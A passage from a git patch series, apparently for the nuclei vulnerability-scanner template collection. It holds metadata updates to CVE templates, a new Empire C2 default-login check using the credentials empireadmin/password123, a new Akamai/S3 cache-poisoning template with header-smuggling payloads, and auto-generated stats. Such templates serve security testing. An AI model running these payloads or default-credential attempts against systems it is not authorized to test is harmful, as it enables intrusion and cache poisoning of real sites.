CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-4050 + cwe-id: CWE-89 metadata: - verified: true - tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,joomsport-sports-league-results-management,unauth + verified: "true" + tags: wpscan,cve,cve2022,sqli,joomsport-sports-league-results-management,wordpress,wp-plugin,wp,unauth requests: - raw: diff --git a/cves/2022/CVE-2022-4260.yaml b/cves/2022/CVE-2022-4260.yaml index 878c3af317..349bc447da 100644 --- a/cves/2022/CVE-2022-4260.yaml +++ b/cves/2022/CVE-2022-4260.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2022,wordpress,wp-plugin,wp,xss,wp-ban,authenticated + tags: xss,wp-ban,wpscan,cve,cve2022,wordpress,wp-plugin,wp,authenticated requests: - raw: diff --git a/cves/2022/CVE-2022-42746.yaml b/cves/2022/CVE-2022-42746.yaml index adadc0de09..6ff93c907c 100644 --- a/cves/2022/CVE-2022-42746.yaml +++ b/cves/2022/CVE-2022-42746.yaml @@ -9,14 +9,15 @@ info: reference: - https://fluidattacks.com/advisories/modestep/ - https://nvd.nist.gov/vuln/detail/CVE-2022-42746 + - https://candidats.net/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-42746 - cwe-id: CWE-80 + cwe-id: CWE-79 metadata: - verified: true shodan-query: http.html:"CandidATS" + verified: "true" tags: cve,cve2022,candidats,xss requests: diff --git a/cves/2022/CVE-2022-45917.yaml b/cves/2022/CVE-2022-45917.yaml index 91179758e9..e39e319344 100644 --- a/cves/2022/CVE-2022-45917.yaml +++ b/cves/2022/CVE-2022-45917.yaml @@ -11,10 +11,15 @@ info: - https://seclists.org/fulldisclosure/2022/Dec/7 - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-ilias-elearning-platform/ - https://github.com/advisories/GHSA-hf6q-rx44-fh6j + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-45917 + cwe-id: CWE-601 metadata: - verified: true shodan-query: http.html:"ILIAS" - tags: cve,cve2022,ilias,redirect + verified: "true" + tags: packetstorm,seclists,cve,cve2022,ilias,redirect requests: - method: GET diff --git a/cves/2022/CVE-2022-46381.yaml b/cves/2022/CVE-2022-46381.yaml index 7f4b1bfb6c..49e6e876c8 100644 --- a/cves/2022/CVE-2022-46381.yaml +++ b/cves/2022/CVE-2022-46381.yaml @@ -9,9 +9,14 @@ info: reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46381 - https://github.com/omarhashem123/Security-Research/blob/main/CVE-2022-46381/CVE-2022-46381.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-46381 + cwe-id: CWE-79 metadata: - verified: "true" shodan-query: http.html:"Linear eMerge" + verified: "true" tags: cve,cve2022,xss,emerge,linear requests: diff --git a/exposures/files/svn-wc-db.yaml b/exposures/files/svn-wc-db.yaml index eda792a694..8b83ed7c27 100644 --- a/exposures/files/svn-wc-db.yaml +++ b/exposures/files/svn-wc-db.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true google-query: intitle:"index of" "wc.db" - tags: exposure,svn,config,files + tags: msf,exposure,svn,config,files requests: - method: GET diff --git a/vulnerabilities/vmware/vmware-nsx-stream-rce.yaml b/vulnerabilities/vmware/vmware-nsx-stream-rce.yaml index 43a046ecd2..21e9b46ad2 100644 --- a/vulnerabilities/vmware/vmware-nsx-stream-rce.yaml +++ b/vulnerabilities/vmware/vmware-nsx-stream-rce.yaml @@ -21,7 +21,7 @@ info: verified: true shodan-query: title:"VMware Appliance Management" fofa-query: title="VMware Appliance Management" - tags: vmware,xstream,rce + tags: rce,msf,vmware,xstream variables: lowerrstr: "{{to_lower(rand_text_alpha(6))}}" diff --git a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml index 99331b2d7a..ff4d27be3a 100644 --- a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml +++ b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml @@ -13,7 +13,7 @@ info: metadata: verified: "true" shodan-query: http.html:"VMG1312-B10D" - tags: misconfig,unauth,zyxel,lfi + tags: misconfig,unauth,zyxel,lfi,msf requests: - raw: From c1fb21f8d83a8f9a8ebd91f280b2fdbdd10ed035 Mon Sep 17 00:00:00 2001 From: clem9669 <18504086+clem9669@users.noreply.github.com> Date: Thu, 5 Jan 2023 17:10:58 +0000 Subject: [PATCH 0758/1133] Create empire-C2.yaml --- default-logins/empire-C2.yaml | 39 +++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 default-logins/empire-C2.yaml diff --git a/default-logins/empire-C2.yaml b/default-logins/empire-C2.yaml new file mode 100644 index 0000000000..a57ddf4ec1 --- /dev/null +++ b/default-logins/empire-C2.yaml @@ -0,0 +1,39 @@ +id: empireC2-default-login-api + +info: + name: Empire-C2 Default Login Api + author: clem9669 + severity: high + description: Kanboard default login was discovered. + reference: + - https://github.com/BC-SECURITY/Empire + - https://bc-security.gitbook.io/empire-wiki/quickstart/configuration/server + tags: default-login,empire + +requests: + - raw: + - | + POST /api/admin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"username":"{{user}}","password":"{{pass}}"} + + attack: pitchfork + payloads: + user: + - empireadmin + pass: + - password123 + + matchers-condition: and + matchers: + - type: word + words: + - 'token' + condition: and + case-insensitive: true + + - type: status + status: + - 200 From d562dce4d342a6e5447d2b5996ffda58d88e22ec Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 5 Jan 2023 17:26:04 +0000 Subject: [PATCH 0759/1133] Auto Generated CVE annotations [Thu Jan 5 17:26:04 UTC 2023] :robot: --- cves/2022/CVE-2022-33891.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-33891.yaml b/cves/2022/CVE-2022-33891.yaml index 709c340a2a..e2aa149468 100644 --- a/cves/2022/CVE-2022-33891.yaml +++ b/cves/2022/CVE-2022-33891.yaml @@ -18,7 +18,7 @@ info: metadata: shodan-query: title:"Spark Master at" verified: "true" - tags: cve,cve2022,apache,spark,authenticated + tags: spark,authenticated,packetstorm,cve,cve2022,apache variables: command: "echo CVE-2022-33891 | rev" From 760a5edb54c4db276461cb003df2cd827e531f2f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 5 Jan 2023 23:30:26 +0530 Subject: [PATCH 0760/1133] =?UTF-8?q?Create=20akamai-s3-cache-poisoning.ya?= =?UTF-8?q?ml=20=F0=9F=94=A5=20=20(#6468)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> --- .../{ => akamai}/akamai-arl-xss.yaml | 0 .../akamai/akamai-s3-cache-poisoning.yaml | 64 +++++++++++++++++++ 2 files changed, 64 insertions(+) rename misconfiguration/{ => akamai}/akamai-arl-xss.yaml (100%) create mode 100644 misconfiguration/akamai/akamai-s3-cache-poisoning.yaml diff --git a/misconfiguration/akamai-arl-xss.yaml b/misconfiguration/akamai/akamai-arl-xss.yaml similarity index 100% rename from misconfiguration/akamai-arl-xss.yaml rename to misconfiguration/akamai/akamai-arl-xss.yaml diff --git a/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml b/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml new file mode 100644 index 0000000000..7de4ada050 --- /dev/null +++ b/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml @@ -0,0 +1,64 @@ +id: akamai-s3-cache-poisoning + +info: + name: Akamai / S3 Cache Poisoning - Stored Cross-Site Scripting + author: DhiyaneshDk + severity: high + reference: + - https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ + - https://owasp.org/www-community/attacks/Cache_Poisoning + metadata: + verified: "true" + tags: cache,poisoning,generic,xss,akamai,s3 + +variables: + rand: "{{rand_base(5)}}" + +requests: + - raw: + - |+ + GET /nuclei.svg?{{rand}}=x HTTP/1.1 + Host: {{Hostname}} + {{escape}}Host: {{bucket}} + + - |+ + GET /nuclei.svg?{{rand}}=x HTTP/1.1 + Host: {{Hostname}} + + attack: clusterbomb + payloads: + escape: + - "\x0b" + - "\x0c" + - "\x1c" + - "\x1d" + - "\x1e" + - "\x1f" + + bucket: + - "nuclei-ap-northeast-1" + - "nuclei-ap-northeast-2" + - "nuclei-ap-northeast-3" + - "nuclei-ap-south-1" + - "nuclei-ap-southeast-1" + - "nuclei-ap-southeast-2" + - "nuclei-ca-central-1" + - "nuclei-eu-central-1" + - "nuclei-eu-north-1" + - "nuclei-eu-west-1" + - "nuclei-eu-west-2" + - "nuclei-eu-west-3" + - "nuclei-sa-east-1" + - "nuclei-us-east-1" + - "nuclei-us-east-2" + - "nuclei-us-west-1" + - "nuclei-us-west-2" + + stop-at-first-match: true + unsafe: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "alert(document.domain)")' + - 'status_code_2 == 200' + condition: and From f44ac5a1d9c98937dbf9d1fd2a020753229c6e18 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 5 Jan 2023 18:00:45 +0000 Subject: [PATCH 0761/1133] Auto Generated New Template Addition List [Thu Jan 5 18:00:45 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 11415fbe49..8ed3e8c61e 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ exposed-panels/mpftvc-admin-panel.yaml exposed-panels/netsparker-panel.yaml exposed-panels/watershed-panel.yaml exposed-panels/zoho/manageengine-network-config.yaml +misconfiguration/akamai/akamai-s3-cache-poisoning.yaml misconfiguration/installer/acunetix-360-installer.yaml misconfiguration/installer/netsparker-enterprise-installer.yaml network/detection/pgsql-detect.yaml From bc1ddc4ab7e04489a21feb5ad60d6718d70d2f04 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 5 Jan 2023 19:24:52 +0000 Subject: [PATCH 0762/1133] Auto Generated Templates Stats [Thu Jan 5 19:24:52 UTC 2023] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 4561 +++++++++++++++++++++--------------------- TOP-10.md | 10 +- 3 files changed, 2287 insertions(+), 2286 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 0495f32706..cc780f3d89 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1575},{"name":"panel","count":803},{"name":"wordpress","count":684},{"name":"edb","count":583},{"name":"wp-plugin","count":579},{"name":"exposure","count":573},{"name":"tech","count":567},{"name":"xss","count":548},{"name":"lfi","count":522},{"name":"cve2021","count":375},{"name":"rce","count":352},{"name":"packetstorm","count":294},{"name":"cve2022","count":283},{"name":"wpscan","count":268},{"name":"misconfig","count":242},{"name":"token-spray","count":237},{"name":"cve2020","count":224},{"name":"unauth","count":211},{"name":"wp","count":201},{"name":"top-200","count":200},{"name":"","count":195},{"name":"config","count":173},{"name":"kev","count":168},{"name":"cve2018","count":145},{"name":"default-login","count":139},{"name":"cve2019","count":138},{"name":"joomla","count":135},{"name":"iot","count":132},{"name":"apache","count":131},{"name":"oast","count":128},{"name":"sqli","count":126},{"name":"authenticated","count":124},{"name":"cve2010","count":111},{"name":"files","count":101},{"name":"top-100","count":100},{"name":"router","count":95},{"name":"redirect","count":91},{"name":"login","count":89},{"name":"network","count":88},{"name":"token","count":76},{"name":"devops","count":76},{"name":"ssrf","count":75},{"name":"takeover","count":74},{"name":"cve2017","count":71},{"name":"auth-bypass","count":69},{"name":"cms","count":67},{"name":"file","count":66},{"name":"install","count":63},{"name":"oracle","count":63},{"name":"intrusive","count":60},{"name":"seclists","count":58},{"name":"disclosure","count":57},{"name":"oss","count":52},{"name":"cisco","count":50},{"name":"cve2016","count":49},{"name":"google","count":48},{"name":"fileupload","count":47},{"name":"cve2015","count":47},{"name":"adobe","count":45},{"name":"aem","count":42},{"name":"logs","count":42},{"name":"cve2014","count":41},{"name":"plugin","count":41},{"name":"hackerone","count":41},{"name":"debug","count":40},{"name":"vmware","count":39},{"name":"atlassian","count":38},{"name":"vulhub","count":38},{"name":"tenable","count":36},{"name":"springboot","count":35},{"name":"traversal","count":35},{"name":"injection","count":34},{"name":"jira","count":32},{"name":"huntr","count":32},{"name":"listing","count":31},{"name":"generic","count":31},{"name":"kubernetes","count":31},{"name":"dns","count":27},{"name":"log4j","count":26},{"name":"microsoft","count":25},{"name":"aws","count":25},{"name":"misc","count":25},{"name":"sap","count":25},{"name":"cnvd","count":25},{"name":"jndi","count":23},{"name":"proxy","count":23},{"name":"fuzz","count":22},{"name":"php","count":22},{"name":"manageengine","count":22},{"name":"zoho","count":22},{"name":"cve2012","count":21},{"name":"api","count":21},{"name":"wp-theme","count":21},{"name":"cicd","count":20},{"name":"deserialization","count":20},{"name":"k8s","count":20},{"name":"cloud","count":20},{"name":"weblogic","count":20},{"name":"tomcat","count":19},{"name":"ibm","count":19},{"name":"camera","count":19},{"name":"dlink","count":18},{"name":"gitlab","count":18},{"name":"wavlink","count":17},{"name":"service","count":17},{"name":"struts","count":17},{"name":"firewall","count":17},{"name":"jenkins","count":17},{"name":"ftp","count":17},{"name":"msf","count":16},{"name":"printer","count":16},{"name":"fortinet","count":15},{"name":"amazon","count":15},{"name":"cve2011","count":15},{"name":"cve2009","count":15},{"name":"xxe","count":15},{"name":"nginx","count":15},{"name":"android","count":14},{"name":"lfr","count":14},{"name":"domainmod","count":14},{"name":"java","count":14},{"name":"status","count":14},{"name":"hp","count":14},{"name":"confluence","count":13},{"name":"cve2008","count":13},{"name":"woocommerce","count":13},{"name":"abstractapi","count":13},{"name":"magento","count":13},{"name":"cve2013","count":13},{"name":"backup","count":12},{"name":"ruijie","count":12},{"name":"netgear","count":12},{"name":"microweber","count":12},{"name":"vpn","count":12},{"name":"fortigate","count":12},{"name":"rails","count":12},{"name":"graphql","count":12},{"name":"drupal","count":12},{"name":"github","count":12},{"name":"zyxel","count":12},{"name":"netsweeper","count":12},{"name":"webserver","count":11},{"name":"mail","count":11},{"name":"cnvd2021","count":11},{"name":"cisa","count":11},{"name":"ssl","count":11},{"name":"backdoor","count":11},{"name":"airflow","count":11},{"name":"azure","count":11},{"name":"dell","count":10},{"name":"admin","count":10},{"name":"ruby","count":10},{"name":"spring","count":10},{"name":"jolokia","count":10},{"name":"glpi","count":10},{"name":"grafana","count":10},{"name":"git","count":10},{"name":"coldfusion","count":10},{"name":"laravel","count":10},{"name":"django","count":10},{"name":"vcenter","count":9},{"name":"wso2","count":9},{"name":"ssti","count":9},{"name":"iis","count":9},{"name":"prometheus","count":9},{"name":"zimbra","count":9},{"name":"kube","count":9},{"name":"windows","count":9},{"name":"npm","count":9},{"name":"ssh","count":9},{"name":"zabbix","count":9},{"name":"fastjson","count":9},{"name":"sonicwall","count":9},{"name":"phpmyadmin","count":9},{"name":"dedecms","count":9},{"name":"versa","count":9},{"name":"scada","count":9},{"name":"solr","count":8},{"name":"metadata","count":8},{"name":"db","count":8},{"name":"symfony","count":8},{"name":"jboss","count":8},{"name":"cisco-switch","count":8},{"name":"audit","count":8},{"name":"docker","count":8},{"name":"config-audit","count":8},{"name":"citrix","count":8},{"name":"hms","count":8},{"name":"recon","count":8},{"name":"elasticsearch","count":8},{"name":"solarview","count":8},{"name":"bucket","count":8},{"name":"mirai","count":8},{"name":"kafka","count":8},{"name":"firebase","count":8},{"name":"auth","count":8},{"name":"jetbrains","count":8},{"name":"headless","count":8},{"name":"exchange","count":7},{"name":"cnvd2020","count":7},{"name":"squirrelmail","count":7},{"name":"emerge","count":7},{"name":"seeyon","count":7},{"name":"blind","count":7},{"name":"opencats","count":7},{"name":"icewarp","count":7},{"name":"ofbiz","count":7},{"name":"python","count":7},{"name":"crlf","count":7},{"name":"druid","count":7},{"name":"maps","count":7},{"name":"go","count":7},{"name":"detect","count":7},{"name":"nodejs","count":7},{"name":"cache","count":7},{"name":"thinkphp","count":7},{"name":"ognl","count":7},{"name":"samsung","count":7},{"name":"huawei","count":6},{"name":"openvpn","count":6},{"name":"jamf","count":6},{"name":"magmi","count":6},{"name":"filemanager","count":6},{"name":"lucee","count":6},{"name":"redis","count":6},{"name":"sitecore","count":6},{"name":"elfinder","count":6},{"name":"enum","count":6},{"name":"cobbler","count":6},{"name":"keycloak","count":6},{"name":"bigip","count":6},{"name":"websphere","count":6},{"name":"liferay","count":6},{"name":"activemq","count":6},{"name":"slack","count":6},{"name":"setup","count":6},{"name":"ecology","count":6},{"name":"jetty","count":6},{"name":"kubelet","count":6},{"name":"node","count":6},{"name":"zhiyuan","count":6},{"name":"smtp","count":6},{"name":"database","count":6},{"name":"opensis","count":6},{"name":"vms","count":6},{"name":"bypass","count":6},{"name":"artica","count":6},{"name":"rconfig","count":6},{"name":"moodle","count":6},{"name":"fpd","count":6},{"name":"microstrategy","count":6},{"name":"carrental","count":5},{"name":"vbulletin","count":5},{"name":"s3","count":5},{"name":"minio","count":5},{"name":"scan","count":5},{"name":"gocd","count":5},{"name":"nagios","count":5},{"name":"plesk","count":5},{"name":"apisix","count":5},{"name":"prestashop","count":5},{"name":"fatpipe","count":5},{"name":"leak","count":5},{"name":"mongodb","count":5},{"name":"rfi","count":5},{"name":"rseenet","count":5},{"name":"elastic","count":5},{"name":"awstats","count":5},{"name":"metinfo","count":5},{"name":"ec2","count":5},{"name":"cockpit","count":5},{"name":"alibaba","count":5},{"name":"cacti","count":5},{"name":"storage","count":5},{"name":"parallels","count":5},{"name":"circarlife","count":5},{"name":"74cms","count":5},{"name":"gogs","count":5},{"name":"error","count":5},{"name":"firmware","count":5},{"name":"fortios","count":5},{"name":"symantec","count":5},{"name":"solarwinds","count":5},{"name":"strapi","count":5},{"name":"avideo","count":5},{"name":"tikiwiki","count":4},{"name":"mautic","count":4},{"name":"dropbear","count":4},{"name":"telesquare","count":4},{"name":"sendgrid","count":4},{"name":"hpe","count":4},{"name":"sangfor","count":4},{"name":"sophos","count":4},{"name":"vrealize","count":4},{"name":"hongdian","count":4},{"name":"flink","count":4},{"name":"beyondtrust","count":4},{"name":"thinkcmf","count":4},{"name":"hybris","count":4},{"name":"hashicorp","count":4},{"name":"telerik","count":4},{"name":"typo3","count":4},{"name":"hoteldruid","count":4},{"name":"photo","count":4},{"name":"redmine","count":4},{"name":"adminer","count":4},{"name":"concrete","count":4},{"name":"jellyfin","count":4},{"name":"candidats","count":4},{"name":"spark","count":4},{"name":"zend","count":4},{"name":"couchdb","count":4},{"name":"sonarqube","count":4},{"name":"console","count":4},{"name":"roxy","count":4},{"name":"horde","count":4},{"name":"gitea","count":4},{"name":"royalevent","count":4},{"name":"gnuboard","count":4},{"name":"panos","count":4},{"name":"cve2007","count":4},{"name":"httpserver","count":4},{"name":"zte","count":4},{"name":"stripe","count":4},{"name":"paypal","count":4},{"name":"geoserver","count":4},{"name":"ems","count":4},{"name":"akamai","count":4},{"name":"asp","count":4},{"name":"prtg","count":4},{"name":"voip","count":4},{"name":"digitalocean","count":4},{"name":"rabbitmq","count":4},{"name":"kibana","count":4},{"name":"nexus","count":4},{"name":"log","count":4},{"name":"kevinlab","count":4},{"name":"aspose","count":4},{"name":"bmc","count":4},{"name":"puppet","count":4},{"name":"umbraco","count":4},{"name":"mikrotik","count":4},{"name":"xmlrpc","count":4},{"name":"tenda","count":4},{"name":"nosqli","count":4},{"name":"wcs","count":4},{"name":"cnvd2019","count":4},{"name":"springcloud","count":4},{"name":"kentico","count":4},{"name":"resin","count":4},{"name":"mailchimp","count":4},{"name":"ruckus","count":4},{"name":"artifactory","count":4},{"name":"microfocus","count":4},{"name":"phpinfo","count":4},{"name":"sql","count":4},{"name":"openemr","count":4},{"name":"axigen","count":4},{"name":"yeswiki","count":4},{"name":"phppgadmin","count":4},{"name":"caucho","count":4},{"name":"linkerd","count":4},{"name":"terramaster","count":4},{"name":"postmessage","count":4},{"name":"search","count":4},{"name":"hikvision","count":4},{"name":"oa","count":4},{"name":"oauth","count":4},{"name":"ampache","count":4},{"name":"trixbox","count":3},{"name":"openbmcs","count":3},{"name":"httpbin","count":3},{"name":"bitbucket","count":3},{"name":"dreambox","count":3},{"name":"gradle","count":3},{"name":"sharepoint","count":3},{"name":"square","count":3},{"name":"fuelcms","count":3},{"name":"mcafee","count":3},{"name":"panabit","count":3},{"name":"glassfish","count":3},{"name":"lotus","count":3},{"name":"graph","count":3},{"name":"nortek","count":3},{"name":"jeesns","count":3},{"name":"digitalrebar","count":3},{"name":"fanruan","count":3},{"name":"dolibarr","count":3},{"name":"webcam","count":3},{"name":"blockchain","count":3},{"name":"finecms","count":3},{"name":"splunk","count":3},{"name":"metabase","count":3},{"name":"jupyter","count":3},{"name":"superadmin","count":3},{"name":"lansweeper","count":3},{"name":"bitrix","count":3},{"name":"getsimple","count":3},{"name":"harbor","count":3},{"name":"eshop","count":3},{"name":"netlify","count":3},{"name":"facebook","count":3},{"name":"subrion","count":3},{"name":"grav","count":3},{"name":"pega","count":3},{"name":"unifi","count":3},{"name":"rocketchat","count":3},{"name":"atom","count":3},{"name":"movable","count":3},{"name":"sftp","count":3},{"name":"influxdb","count":3},{"name":"modem","count":3},{"name":"openstack","count":3},{"name":"selea","count":3},{"name":"key","count":3},{"name":"webmail","count":3},{"name":"ebs","count":3},{"name":"geowebserver","count":3},{"name":"synology","count":3},{"name":"ampps","count":3},{"name":"webmin","count":3},{"name":"aptus","count":3},{"name":"openam","count":3},{"name":"labkey","count":3},{"name":"octobercms","count":3},{"name":"nuuo","count":3},{"name":"dom","count":3},{"name":"trendnet","count":3},{"name":"samba","count":3},{"name":"netdata","count":3},{"name":"smb","count":3},{"name":"dzzoffice","count":3},{"name":"payara","count":3},{"name":"sugarcrm","count":3},{"name":"httpd","count":3},{"name":"r-seenet","count":3},{"name":"intercom","count":3},{"name":"rackn","count":3},{"name":"targa","count":3},{"name":"totolink","count":3},{"name":"processwire","count":3},{"name":"redash","count":3},{"name":"tableau","count":3},{"name":"openfire","count":3},{"name":"wordfence","count":3},{"name":"circleci","count":3},{"name":"cloudflare","count":3},{"name":"mobileiron","count":3},{"name":"jfrog","count":3},{"name":"linksys","count":3},{"name":"yonyou","count":3},{"name":"axis","count":3},{"name":"actuator","count":3},{"name":"pentaho","count":3},{"name":"rlm","count":3},{"name":"thinfinity","count":3},{"name":"bruteforce","count":3},{"name":"steve","count":3},{"name":"selenium","count":3},{"name":"flexvnf","count":3},{"name":"carel","count":3},{"name":"epson","count":3},{"name":"codeigniter","count":3},{"name":"odoo","count":3},{"name":"consul","count":3},{"name":"clusterengine","count":3},{"name":"nacos","count":3},{"name":"kkfileview","count":3},{"name":"bigant","count":3},{"name":"kfm","count":3},{"name":"matrix","count":3},{"name":"express","count":3},{"name":"seagate","count":3},{"name":"pip","count":3},{"name":"messaging","count":3},{"name":"empirecms","count":3},{"name":"hsphere","count":3},{"name":"teamcity","count":3},{"name":"ivanti","count":3},{"name":"servicenow","count":3},{"name":"centos","count":3},{"name":"mongo","count":3},{"name":"goanywhere","count":3},{"name":"fileman","count":3},{"name":"mantisbt","count":3},{"name":"kingsoft","count":3},{"name":"heroku","count":3},{"name":"graylog","count":3},{"name":"pfsense","count":3},{"name":"axis2","count":3},{"name":"mysql","count":3},{"name":"weiphp","count":3},{"name":"thruk","count":3},{"name":"elementor","count":3},{"name":"proftpd","count":3},{"name":"zeroshell","count":3},{"name":"qnap","count":3},{"name":"globalprotect","count":3},{"name":"sentry","count":3},{"name":"3cx","count":3},{"name":"telnet","count":3},{"name":"voipmonitor","count":3},{"name":"avtech","count":3},{"name":"cve2005","count":3},{"name":"buffalo","count":3},{"name":"webadmin","count":3},{"name":"dotcms","count":3},{"name":"drawio","count":3},{"name":"ansible","count":3},{"name":"overflow","count":2},{"name":"pypiserver","count":2},{"name":"akkadian","count":2},{"name":"rancher","count":2},{"name":"nasos","count":2},{"name":"chamilo","count":2},{"name":"default-page","count":2},{"name":"sass","count":2},{"name":"eko","count":2},{"name":"jsf","count":2},{"name":"sony","count":2},{"name":"dubbo","count":2},{"name":"aviatrix","count":2},{"name":"shenyu","count":2},{"name":"etherpad","count":2},{"name":"gitblit","count":2},{"name":"openresty","count":2},{"name":"traefik","count":2},{"name":"yapi","count":2},{"name":"imap","count":2},{"name":"pulse","count":2},{"name":"alfresco","count":2},{"name":"opencart","count":2},{"name":"bomgar","count":2},{"name":"arcgis","count":2},{"name":"kanboard","count":2},{"name":"books","count":2},{"name":"fortiweb","count":2},{"name":"fortimail","count":2},{"name":"cloudinary","count":2},{"name":"gateway","count":2},{"name":"xiaomi","count":2},{"name":"wwbn","count":2},{"name":"tongda","count":2},{"name":"blesta","count":2},{"name":"embed","count":2},{"name":"acunetix","count":2},{"name":"homematic","count":2},{"name":"mbean","count":2},{"name":"hadoop","count":2},{"name":"submitty","count":2},{"name":"dashboard","count":2},{"name":"xnat","count":2},{"name":"globaldomains","count":2},{"name":"scriptcase","count":2},{"name":"hjtcloud","count":2},{"name":"idrac","count":2},{"name":"sqlite","count":2},{"name":"avaya","count":2},{"name":"secret","count":2},{"name":"espeasy","count":2},{"name":"wapples","count":2},{"name":"sysaid","count":2},{"name":"pam","count":2},{"name":"puppetdb","count":2},{"name":"zzzcms","count":2},{"name":"projectsend","count":2},{"name":"sitemap","count":2},{"name":"apollo","count":2},{"name":"domxss","count":2},{"name":"horizon","count":2},{"name":"loytec","count":2},{"name":"reolink","count":2},{"name":"servicedesk","count":2},{"name":"terraform","count":2},{"name":"metersphere","count":2},{"name":"portal","count":2},{"name":"ucmdb","count":2},{"name":"maian","count":2},{"name":"matomo","count":2},{"name":"ranger","count":2},{"name":"avantfax","count":2},{"name":"netflix","count":2},{"name":"tornado","count":2},{"name":"cocoon","count":2},{"name":"fiori","count":2},{"name":"frp","count":2},{"name":"qihang","count":2},{"name":"nextcloud","count":2},{"name":"ad","count":2},{"name":"eprints","count":2},{"name":"viewpoint","count":2},{"name":"emqx","count":2},{"name":"hubspot","count":2},{"name":"ilo","count":2},{"name":"neos","count":2},{"name":"karaf","count":2},{"name":"piwigo","count":2},{"name":"redhat","count":2},{"name":"apple","count":2},{"name":"j2ee","count":2},{"name":"inspur","count":2},{"name":"ebook","count":2},{"name":"adiscon","count":2},{"name":"tplink","count":2},{"name":"lenovo","count":2},{"name":"mybb","count":2},{"name":"guacamole","count":2},{"name":"avada","count":2},{"name":"teampass","count":2},{"name":"landesk","count":2},{"name":"ubnt","count":2},{"name":"xml","count":2},{"name":"veeam","count":2},{"name":"clansphere","count":2},{"name":"weather","count":2},{"name":"commax","count":2},{"name":"kong","count":2},{"name":"hiveos","count":2},{"name":"oidc","count":2},{"name":"idor","count":2},{"name":"flatpress","count":2},{"name":"javascript","count":2},{"name":"dotnet","count":2},{"name":"zzcms","count":2},{"name":"myfactory","count":2},{"name":"lantronix","count":2},{"name":"hospital","count":2},{"name":"discourse","count":2},{"name":"frontpage","count":2},{"name":"mida","count":2},{"name":"xxljob","count":2},{"name":"linux","count":2},{"name":"gryphon","count":2},{"name":"forcepoint","count":2},{"name":"nps","count":2},{"name":"webuzo","count":2},{"name":"aerohive","count":2},{"name":"kiwitcms","count":2},{"name":"loqate","count":2},{"name":"wamp","count":2},{"name":"pagespeed","count":2},{"name":"linkedin","count":2},{"name":"wpqa","count":2},{"name":"rundeck","count":2},{"name":"wooyun","count":2},{"name":"supermicro","count":2},{"name":"eris","count":2},{"name":"zerof","count":2},{"name":"octoprint","count":2},{"name":"dotnetnuke","count":2},{"name":"clamav","count":2},{"name":"phpstorm","count":2},{"name":"itop","count":2},{"name":"netscaler","count":2},{"name":"aircube","count":2},{"name":"circontrol","count":2},{"name":"angular","count":2},{"name":"couchbase","count":2},{"name":"uwsgi","count":2},{"name":"osticket","count":2},{"name":"audiocodes","count":2},{"name":"temenos","count":2},{"name":"opsview","count":2},{"name":"appcms","count":2},{"name":"dvr","count":2},{"name":"dvwa","count":2},{"name":"eyesofnetwork","count":2},{"name":"codemeter","count":2},{"name":"rackstation","count":2},{"name":"orchid","count":2},{"name":"otobo","count":2},{"name":"tiny","count":2},{"name":"azkaban","count":2},{"name":"plastic","count":2},{"name":"bash","count":2},{"name":"ixcache","count":2},{"name":"alienvault","count":2},{"name":"tileserver","count":2},{"name":"hasura","count":2},{"name":"synopsys","count":2},{"name":"favicon","count":2},{"name":"hue","count":2},{"name":"owncloud","count":2},{"name":"livehelperchat","count":2},{"name":"phpcollab","count":2},{"name":"backups","count":2},{"name":"pbootcms","count":2},{"name":"flir","count":2},{"name":"ericsson","count":2},{"name":"yii","count":2},{"name":"aruba","count":2},{"name":"ametys","count":2},{"name":"sniplets","count":2},{"name":"zblogphp","count":2},{"name":"xenmobile","count":2},{"name":"werkzeug","count":2},{"name":"f5","count":2},{"name":"rosariosis","count":2},{"name":"kettle","count":2},{"name":"netis","count":2},{"name":"owasp","count":2},{"name":"upload","count":2},{"name":"kkFileView","count":2},{"name":"syslog","count":2},{"name":"jmx","count":2},{"name":"text","count":2},{"name